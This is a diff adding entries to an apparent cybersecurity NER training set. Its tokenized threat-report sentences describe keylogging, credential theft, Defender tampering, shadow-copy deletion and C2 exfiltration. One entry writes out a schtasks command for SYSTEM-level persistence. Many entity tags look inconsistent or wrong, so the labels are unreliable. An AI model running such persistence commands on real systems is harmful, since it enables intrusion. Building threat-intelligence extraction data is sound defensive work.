"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Like", + "the", + "domain,", + "the", + "URI", + "is", + "composed", + "using", + "a", + "set", + "of", + "hardcoded", + "keywords", + "and", + "paths,", + "which", + "are", + "chosen", + "partly", + "at", + "random", + "and", + "partly", + "based", + "on", + "the", + "type", + "of", + "HTTP", + "request", + "that", + "is", + "being", + "sent", + "out." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DeleteFile" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "deleting", + "files" + ], + "ner_tags": [ + "B-SamFile", + "B-Features" + ] + }, + { + "tokens": [ + "ReadRegistryValue" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "GetRegistrySubKeyAndValueNames" + ], + "ner_tags": [ + "B-Way" + ] + }, + { + "tokens": [ + "enumerate", + "files", + "and", + "registry", + "keys" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "content", + "of", + "the", + "MachineGuid", + "registry", + "value", + "from", + "the", + "key", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DeleteRegistryValue" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "SetRegistryValue" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "manipulating", + "of", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GetProcessByDescription" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "enumerate", + "processes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "command", + "CollectSystemDescription", + "retrieves", + "the", + "following", + "information:", + "Local", + "Computer", + "Domain", + "name", + "Administrator", + "Account", + "SID", + "HostName" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OS", + "Version" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "domain", + "name", + "of", + "the", + "device" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "System", + "Directory" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "avoid", + "detection,", + "attackers", + "renamed", + "Windows", + "administrative", + "tools", + "like", + "adfind.exe", + "which", + "were", + "then", + "used", + "for", + "domain", + "enumeration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "schtasks", + "/create", + "/F", + "/tn", + "“\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager”", + "/tr", + "“C:\\Windows\\SoftwareDistribution\\EventCacheManager.exe”", + "/sc", + "ONSTART", + "/ru", + "system", + "/" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "Rundll32," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "and", + "upload", + "information", + "about", + "the", + "device" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "report", + "some", + "basic", + "information", + "about", + "the", + "compromised", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ability", + "to", + "log", + "keystrokes" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "keystrokes" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "logs", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "capture", + "screenshots," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "“The", + "reconnaissance", + "data", + "is", + "exfiltrated", + "to", + "the", + "attacker-controlled", + "server", + "through", + "an", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker-controlled", + "server", + "through", + "an", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "phishing", + "emails", + "with", + "malicious", + "HTML", + "attachments" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "operating", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collecting", + "system", + "information", + "such", + "as", + "hostnames" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OS", + "version", + "information" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "the", + "payloads", + "by", + "sideloading", + "them", + "to", + "the", + "legitimate", + "executables" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "insights", + "on", + "anti-virus", + "software", + "present", + "on", + "the", + "machine" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "and", + "executing", + "two", + "other", + "PowerShell", + "scripts", + "from", + "a", + "different", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "IPv4", + "addresses" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "“The", + "banking", + "trojan", + "targets", + "the", + "victim’s", + "sensitive", + "information" + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "user", + "credentials", + "have", + "been", + "compromised,", + "this", + "tool", + "takes", + "“full", + "control”", + "of", + "the", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“When", + "a", + "victim", + "opens", + "the", + "HTML", + "file", + "attachment,", + "an", + "embedded", + "URL", + "is", + "launched", + "in", + "the", + "victim’s", + "browser,", + "redirecting", + "to", + "another", + "malicious", + "HTML", + "file", + "from", + "an", + "attacker-controlled", + "AWS", + "EC2", + "instance" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Identify", + "processes" + ], + "ner_tags": [ + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Logged", + "Processes" + ], + "ner_tags": [ + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Identify", + "processes", + "related", + "to", + "backups,", + "antivirus/anti-spyware," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "actors", + "have", + "also", + "gained", + "initial", + "access", + "to", + "victim", + "networks", + "by", + "distributing", + "phishing", + "emails", + "with", + "malicious", + "attachments" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "exploiting", + "the", + "following", + "vulnerabilities", + "against", + "Microsoft", + "Exchange", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "removes", + "virus", + "definitions", + "and", + "disables", + "all", + "portions", + "of", + "Windows", + "Defender", + "and", + "other", + "common", + "antivirus", + "programs", + "in", + "the", + "system", + "registry" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "Windows", + "Defender", + "AntiVirus", + "Protection", + "disabled" + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "Windows", + "Defender", + "AntiSpyware", + "Protection", + "disabled" + ], + "ner_tags": [ + "O", + "O", + "I-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "Exchange", + "Server", + "Privilege", + "Escalation", + "Vulnerability" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Exp" + ] + }, + { + "tokens": [ + "remove", + "all", + "existing", + "shadow", + "copies", + "via", + "vssadmin", + "on", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "could", + "cause", + "the", + "file", + "to", + "run", + "when", + "double-clicked", + "instead", + "of", + "opening", + "it", + "with", + "a", + "PDF", + "viewer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "and", + "then", + "downloads", + "a", + "second-stage", + "backdoor", + "from", + "the", + "OpenDrive", + "cloud", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "routine", + "shared", + "between", + "the", + "BADCALL", + "for", + "Linux", + "and", + "targeted", + "destructive", + "malware", + "for", + "Windows", + "from", + "2014" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "uses", + "the", + "same", + "type", + "of", + "strong", + "encryption", + "–", + "AES-GCM" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "creates", + "a", + "scheduled", + "task", + "on", + "the", + "system", + "that", + "provides", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "scheduled", + "task", + "on", + "the", + "system", + "that", + "provides", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "scheduled", + "task", + "on", + "the", + "system", + "that", + "provides", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establishes", + "persistence", + "by", + "creating", + "an", + "autostart", + "service", + "that", + "allows", + "it", + "to", + "run", + "whenever", + "the", + "machine", + "boots." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establishes", + "persistence", + "by", + "creating", + "an", + "autostart", + "service", + "that", + "allows", + "it", + "to", + "run", + "whenever", + "the", + "machine", + "boots." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "the", + "configuration", + "data", + "and", + "modules." + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "into", + "the", + "svchost.exe", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "injects", + "into", + "the", + "svchost.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "malicious", + "actors", + "spread", + "primarily", + "by", + "spearphishing", + "campaigns", + "using", + "tailored", + "emails", + "that", + "contain", + "malicious", + "attachments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "used", + "an", + "email", + "with", + "an", + "Excel", + "sheet", + "containing", + "a", + "malicious", + "macro", + "to", + "deploy", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compromised", + "server", + "that", + "prompts", + "the", + "victim", + "to", + "click" + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "clicking", + "the", + "photo,", + "the", + "victim", + "unknowingly", + "downloads", + "a", + "malicious", + "JavaScript", + "file", + "that" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "has", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "documents", + "to", + "deliver", + "its", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spread", + "the", + "malware", + "laterally", + "across", + "a", + "network", + "by", + "abusing", + "the", + "Server", + "Message", + "Block", + "(SMB)", + "Protocol." + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "modules", + "spread", + "the", + "malware", + "laterally", + "across", + "a", + "network", + "by", + "abusing", + "the", + "SMB", + "Protocol." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "data", + "exfiltration", + "over", + "a", + "hardcoded", + "C2", + "server" + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "send", + "information", + "about", + "the", + "compromised", + "host", + "to", + "a", + "hardcoded", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "Windows", + "Application", + "Programming", + "Interface", + "(API)", + "call,", + "CreateProcessW(),", + "to", + "manage", + "execution", + "flow." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "by", + "capturing", + "the", + "CredEnumerateA", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "capturing", + "the", + "CredEnumerateA", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leveraging", + "Microsoft’s", + "CryptoAPI" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "an", + "AES", + "CBC", + "(256", + "bits)", + "encryption", + "algorithm", + "for", + "its", + "loader", + "and", + "configuration", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "leverages", + "a", + "custom", + "packer", + "to", + "obfuscate", + "its", + "functionality." + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "modify", + "registry", + "entries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "can", + "obtain", + "passwords", + "stored", + "in", + "files", + "from", + "several", + "applications", + "such", + "as", + "Outlook,", + "Filezilla,", + "OpenSSH,", + "OpenVPN", + "and", + "WinSCP." + ], + "ner_tags": [ + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "it", + "searches", + "for", + "the", + ".vnc.lnk", + "affix", + "to", + "steal", + "VNC", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "can", + "obtain", + "passwords", + "stored", + "in", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "querying", + "the", + "Software\\SimonTatham\\Putty\\Sessions", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtains", + "the", + "IP", + "address,", + "location,", + "and", + "other", + "relevant", + "network", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "identify", + "the", + "user", + "and", + "groups", + "the", + "user", + "belongs", + "to", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gathers", + "the", + "OS", + "version,", + "machine", + "name,", + "CPU", + "type,", + "amount", + "of", + "RAM", + "available", + "from", + "the", + "victim’s", + "machine" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "searches", + "the", + "system", + "for", + "all", + "of", + "the", + "following", + "file", + "extensions:", + ".avi,", + ".mov,", + ".mkv,", + ".mpeg,", + ".mpeg4,", + ".mp4,", + ".mp3,", + ".wav,", + ".ogg,", + ".jpeg,", + ".jpg,", + ".png,", + ".bmp,", + ".gif,", + ".tiff,", + ".ico,", + ".xlsx,", + "and", + ".zip." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "collects", + "local", + "files", + "and", + "information", + "from", + "the", + "victim’s", + "local", + "machine." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "HTTPS", + "to", + "communicate", + "with", + "its", + "C2", + "servers" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "samples", + "have", + "used", + "HTTP", + "over", + "ports", + "447", + "and", + "8082", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "several", + "additional", + "files", + "and", + "saves", + "them", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "custom", + "crypter", + "leveraging", + "Microsoft’s", + "CryptoAPI", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + } +] \ No newline at end of file